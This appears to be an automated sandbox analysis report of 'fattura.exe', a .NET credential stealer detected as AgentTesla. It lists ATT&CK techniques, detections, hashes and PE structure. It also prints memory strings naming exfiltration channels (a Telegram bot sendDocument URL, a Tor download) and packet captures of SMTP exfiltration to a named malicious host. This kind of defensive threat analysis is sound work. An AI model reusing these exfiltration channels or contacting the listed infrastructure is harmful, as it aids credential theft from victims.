External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection212	DCSync	Application Window Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
fattura.exe	25%	ReversingLabs	ByteCode-MSIL.Infostealer.DarkStealer
fattura.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File
0.2.fattura.exe.5510000.1.unpack	100%	Avira	HEUR/AGEN.1138205		Download File

Domains

Source	Detection	Scanner	Label	Link
greatdeck.co	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://greatdeck.co	0%	Avira URL Cloud	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://DynDns.comDynDNS	0%	URL Reputation	safe
http://mail.greatdeck.co	0%	Avira URL Cloud	safe
http://LoTLRwkC9qh4QyRRa.comP	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	0%	URL Reputation	safe
http://Bvcujr.com	0%	Avira URL Cloud	safe
http://LoTLRwkC9qh4QyRRa.com	0%	Avira URL Cloud	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe
https://api.ipify.orgGETMozilla/5.0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
greatdeck.co	162.222.226.70	true	true	1%, Virustotal, Browse	unknown
mail.greatdeck.co	unknown	unknown	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://greatdeck.co	RegAsm.exe, 00000002.00000002.920950784.0000000002DDA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://DynDns.comDynDNS	RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://mail.greatdeck.co	RegAsm.exe, 00000002.00000002.920950784.0000000002DDA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://LoTLRwkC9qh4QyRRa.comP	RegAsm.exe, 00000002.00000002.920893237.0000000002D98000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org/bot%telegramapi%/	fattura.exe, 00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp, RegAsm.exe, 00000002.00000002.919344490.0000000000402000.00000040.00000001.sdmp	false		high
https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x	RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip	fattura.exe, 00000000.00000003.663757971.00000000057F5000.00000004.00000001.sdmp, RegAsm.exe, 00000002.00000002.919344490.0000000000402000.00000040.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://Bvcujr.com	RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://LoTLRwkC9qh4QyRRa.com	RegAsm.exe, 00000002.00000002.920893237.0000000002D98000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://api.ipify.orgGETMozilla/5.0	RegAsm.exe, 00000002.00000002.920493622.0000000002A81000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.222.226.70	unknown	United States		394695	PUBLIC-DOMAIN-REGISTRYUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321142
Start date:	20.11.2020
Start time:	12:35:24
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	fattura.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/1@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 0.4% (good quality ratio 0.3%) Quality average: 68% Quality standard deviation: 24.6%
HCA Information:	Successful, ratio: 100% Number of executed functions: 74 Number of non-executed functions: 3
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 104.43.193.48, 51.104.139.180, 52.155.217.156, 20.54.26.129, 205.185.216.42, 205.185.216.10, 95.101.22.134, 95.101.22.125 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:36:29	API Interceptor	840x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
162.222.226.70	Zahlung.exe	Get hash	malicious	Browse
	Zahlung.exe	Get hash	malicious	Browse
	Lieferadresse.exe	Get hash	malicious	Browse
	Shipment address.exe	Get hash	malicious	Browse
	dettagli di pagamento.exe	Get hash	malicious	Browse
	Zahlungskopie.exe	Get hash	malicious	Browse
	SecuriteInfo.com.AdWare.Amonetize.arhz.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Siggen11.2816.22071.exe	Get hash	malicious	Browse
	https://spark.adobe.com/page/s4liZTtRbzbxD	Get hash	malicious	Browse
	https://1drv.ms/u/s!Aj1pdKAYa9n0gTIji9Ijnr6xK0RL?e=HEGTEl	Get hash	malicious	Browse
	Purchase-Order2750.html	Get hash	malicious	Browse
	https://jcbintegrador.com.pe/ddgghhf67643bhjbhdfbdocpdf	Get hash	malicious	Browse
	http://larryyoungpavlngz.com/0s	Get hash	malicious	Browse
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fartecorpus.net%2fwp-includes%2fSimplePie%2fParse%2fowa.php%2findex.html%3fl%3d_JeHFUq_VJOXK0QWHtoGYDw_Product-UserID%26%23charles.teel%40goodmanmfg.com&c=E,1,rYcxrrvcAzv2WFpvjh62IzTFJoxfScVTKXZV3aj80Afb6YKCrifwPWMgT9kxNyr4CqCYIochrADK8LmpYhp1FsBFERt0zZ1-TqzxuvkiNiScqD-ywXqZOePgJg,,&typo=1	Get hash	malicious	Browse
	https://aerosurcolombia.com/AUSSIE.html	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
PUBLIC-DOMAIN-REGISTRYUS	PO1.xlsx	Get hash	malicious	Browse	208.91.199.223
	QKLQkaCe9M.exe	Get hash	malicious	Browse	208.91.199.224
	Zahlung.exe	Get hash	malicious	Browse	162.222.226.70
	0hgHwEkIWY.exe	Get hash	malicious	Browse	208.91.198.143
	Swift Copy.exe	Get hash	malicious	Browse	208.91.199.224
	Shipping Details_PDF.exe	Get hash	malicious	Browse	208.91.199.225
	Zahlung.exe	Get hash	malicious	Browse	162.222.226.70
	Lieferadresse.exe	Get hash	malicious	Browse	162.222.226.70
	RFQ_SMKM19112020.xlsx	Get hash	malicious	Browse	208.91.199.224
	Order List.xlsx	Get hash	malicious	Browse	208.91.199.225
	Shipping doc.pdf.exe	Get hash	malicious	Browse	208.91.198.143
	OrV86zxFWHW1j0f.exe	Get hash	malicious	Browse	208.91.199.224
	XDMBhLJxD1Qf7JW.exe	Get hash	malicious	Browse	208.91.199.224
	me4qssWAMQ.exe	Get hash	malicious	Browse	208.91.199.225
	Vd58qg0dhp.exe	Get hash	malicious	Browse	208.91.199.223
	15egpuWfT3.exe	Get hash	malicious	Browse	208.91.199.224
	PO_287104.exe	Get hash	malicious	Browse	208.91.198.225
	Machine drawing.exe	Get hash	malicious	Browse	199.79.63.24
	Shipping Details.exe	Get hash	malicious	Browse	208.91.198.143
	Wrong Transfer Payment - Chk Clip Copy.exe	Get hash	malicious	Browse	208.91.199.223

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fattura.exe.log Download File
Process:	C:\Users\user\Desktop\fattura.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	315
Entropy (8bit):	5.350410246151501
Encrypted:	false
SSDEEP:	6:Q3La/xwcE73FKDLIP12MUAvvr3tDLIP12MUAvvR+uTL2LDY3U21v:Q3La/hg1KDLI4M9tDLI4MWuPk21v
MD5:	EE0BB4B63A030A0BF7087CB0AEBD07BC
SHA1:	9A4ADFB6336E22D49503B4B99FFC25A7882AE202
SHA-256:	6CBBAF20B7871B931A8A0B1D54890DC0E6C9ED78E7DEC5E2AB2F6D12DF349DFF
SHA-512:	47644A669A15A83D0BAA1F801BB34E36B1F8FE700E5C7A4396D684FE85AFFF6B32F511AEDD0E304DB48383E04A5044CA1B313D559737F5CD967CC00F8FDFC38B
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.86086603352849
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	fattura.exe
File size:	618496
MD5:	ac16b512e9de9308fa69b78af1faed07
SHA1:	85eff7055833458712baa0facf48269317d38bff
SHA256:	2112f6c6abb4fe84e62fd5ff70f880413b3e54610535b1bd1e5d9ca64d6206f5
SHA512:	9c325aa0df68ccbc8398ad3bd181c7084d88ee7ee51b49639f730bbdbd15f3fbcf1fb3361701d411ccbf70e1b599a9a854f37e2e1d1a37cb5474cefaa5dee4a0
SSDEEP:	12288:IvFCnJw4N72vng/saho7+NeB0uUo8ndBuymcGuBQqvlQOx:8FuiQy/GHhfG0uUUyfGuBQ0lQO
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....y._.................h............... ........@.. ..............................G.....@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4987ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB779C3 [Fri Nov 20 08:09:39 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9877c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9a000	0x242	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x967d4	0x96800	False	0.918727938123	data	7.86592227679	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x9a000	0x242	0x400	False	0.310546875	data	3.56952524932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9c000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x9a058	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/20/20-12:37:56.843422	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49767	587	192.168.2.4	162.222.226.70

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 12:37:55.461395025 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:55.610898018 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:55.611006021 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:55.984190941 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:55.984671116 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.124622107 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.125966072 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.265924931 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.266896963 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.408432961 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.409766912 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.549482107 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.550213099 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.693073988 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.693809032 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.834487915 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.834531069 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.843421936 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.843632936 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.844202995 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.844362974 CET	49767	587	192.168.2.4	162.222.226.70
Nov 20, 2020 12:37:56.984949112 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.986042976 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:56.988037109 CET	587	49767	162.222.226.70	192.168.2.4
Nov 20, 2020 12:37:57.038861990 CET	49767	587	192.168.2.4	162.222.226.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 12:36:16.977535009 CET	49257	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:17.004702091 CET	53	49257	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:17.671792030 CET	62389	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:17.698962927 CET	53	62389	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:22.558243990 CET	49910	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:22.585186958 CET	53	49910	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:23.203993082 CET	55854	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:23.231062889 CET	53	55854	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:23.943427086 CET	64549	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:23.970490932 CET	53	64549	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:24.589713097 CET	63153	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:24.616849899 CET	53	63153	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:25.329967022 CET	52991	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:25.365650892 CET	53	52991	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:26.143235922 CET	53700	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:26.170371056 CET	53	53700	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:26.951157093 CET	51726	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:26.978349924 CET	53	51726	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:27.769819975 CET	56794	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:27.796899080 CET	53	56794	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:28.403497934 CET	56534	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:28.432039976 CET	53	56534	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:29.310445070 CET	56627	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:29.337625027 CET	53	56627	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:35.495567083 CET	56621	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:35.522701025 CET	53	56621	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:36.298536062 CET	63116	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:36.325670004 CET	53	63116	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:36.802314043 CET	64078	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:36.829503059 CET	53	64078	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:36.985817909 CET	64801	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:37.012861013 CET	53	64801	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:37.792067051 CET	61721	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:37.819253922 CET	53	61721	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:38.596724987 CET	51255	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:38.624023914 CET	53	51255	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:51.646224976 CET	61522	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:51.682312012 CET	53	61522	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:52.176069021 CET	52337	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:52.203248024 CET	53	52337	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:52.608827114 CET	55046	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:52.644793987 CET	53	55046	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:52.972162962 CET	49612	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:52.999258995 CET	53	49612	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:53.243901014 CET	49285	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:53.270951986 CET	53	49285	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:53.451519966 CET	50601	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:53.487291098 CET	53	50601	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:53.873852015 CET	60875	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:53.900839090 CET	53	60875	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:54.320349932 CET	56448	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:54.355807066 CET	53	56448	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:55.006170988 CET	59172	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:55.041843891 CET	53	59172	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:55.609106064 CET	62420	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:55.636136055 CET	53	62420	8.8.8.8	192.168.2.4
Nov 20, 2020 12:36:56.182677984 CET	60579	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:36:56.220634937 CET	53	60579	8.8.8.8	192.168.2.4
Nov 20, 2020 12:37:01.435817957 CET	50183	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:37:01.463015079 CET	53	50183	8.8.8.8	192.168.2.4
Nov 20, 2020 12:37:11.987037897 CET	61531	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:37:12.014147043 CET	53	61531	8.8.8.8	192.168.2.4
Nov 20, 2020 12:37:12.183083057 CET	49228	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:37:12.210105896 CET	53	49228	8.8.8.8	192.168.2.4
Nov 20, 2020 12:37:14.860816002 CET	59794	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:37:14.899347067 CET	53	59794	8.8.8.8	192.168.2.4
Nov 20, 2020 12:37:46.295819998 CET	55916	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:37:46.323276043 CET	53	55916	8.8.8.8	192.168.2.4
Nov 20, 2020 12:37:47.459675074 CET	52752	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:37:47.505688906 CET	53	52752	8.8.8.8	192.168.2.4
Nov 20, 2020 12:37:55.364053965 CET	60542	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:37:55.399847984 CET	53	60542	8.8.8.8	192.168.2.4
Nov 20, 2020 12:37:55.411382914 CET	60689	53	192.168.2.4	8.8.8.8
Nov 20, 2020 12:37:55.446657896 CET	53	60689	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 20, 2020 12:37:55.364053965 CET	192.168.2.4	8.8.8.8	0x256f	Standard query (0)	mail.greatdeck.co	A (IP address)	IN (0x0001)
Nov 20, 2020 12:37:55.411382914 CET	192.168.2.4	8.8.8.8	0xd81d	Standard query (0)	mail.greatdeck.co	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 20, 2020 12:37:55.399847984 CET	8.8.8.8	192.168.2.4	0x256f	No error (0)	mail.greatdeck.co	greatdeck.co		CNAME (Canonical name)	IN (0x0001)
Nov 20, 2020 12:37:55.399847984 CET	8.8.8.8	192.168.2.4	0x256f	No error (0)	greatdeck.co		162.222.226.70	A (IP address)	IN (0x0001)
Nov 20, 2020 12:37:55.446657896 CET	8.8.8.8	192.168.2.4	0xd81d	No error (0)	mail.greatdeck.co	greatdeck.co		CNAME (Canonical name)	IN (0x0001)
